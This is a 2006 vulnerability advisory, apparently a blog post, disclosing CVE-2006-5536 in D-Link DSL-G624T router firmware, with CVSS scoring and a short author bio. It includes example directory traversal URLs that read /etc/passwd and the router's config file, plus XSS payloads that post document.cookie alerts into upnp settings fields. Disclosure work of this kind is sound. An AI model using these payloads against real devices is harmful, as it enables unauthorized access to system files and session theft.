advisories,

CVE-2006-5536: D-Link DSL-G624T several vulnerabilities

Jose Ramon Palanco Jose Ramon Palanco Follow Oct 26, 2006 · 1 min read
CVE-2006-5536: D-Link DSL-G624T several vulnerabilities
Share this

Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter.

Researcher

José Ramón Palanco: jpalanco@gmail.com

Details

Vulnerabilities

Directory transversal

Examples:

http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting

Affected url: http://router/cgi-bin/webcm

Method Variable Value
POST upnp%3Asettings%2Fstate >”><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST upnp%3Asettings%2Fconnection >”><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST upnp%3Asettings%2Fconnection “+onmouseover=”alert(document.cookie)

Directory listing

Affected: /cgi-bin directory

Products and Versions

  • Vendor: D-LINK
  • Product: DSL-G624T
  • Version: V3.00B01T01.YA-C.20060616

CPE v2.3

cpe:2.3:h:d-link:dsl-g624t:firmware_3.00b01t01.ya_c.2006-06-16:::::::*

CVSS Scores & Vulnerability Types

Name Value
CVSS Score 5.0
Confidentiality Impact Partial (There is considerable informational disclosure.)
Integrity Impact None (There is no impact to the integrity of the system)
Availability Impact None (There is no impact to the availability of the system.)
Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication Not required (Authentication is not required to exploit the vulnerability.)
Gained Access None
Vulnerability Type(s) Directory traversal
CWE ID CWE id is not defined for this vulnerability

References

Jose Ramon Palanco
Written by Jose Ramon Palanco Follow
Jose Ramón Palanco founded Dinoflux at 2014, a Threat Intelligence startup acquired by Telefonica, currently he works for 11paths since 2018. He worked also for Ericsson at R&D department and Optenet (Allot). He studied Telecommunications Engineering at the University of Alcala de Henares and Master of IT Governance at the University of Deusto. He has been a speaker at OWASP, ROOTEDCON, ROOTCON, MALCON, and FAQin... He has published several CVE and different open source tools for cybersecurity like nmap-scada, ProtocolDetector, escan, pma, EKanalyzer, SCADA IDS, ...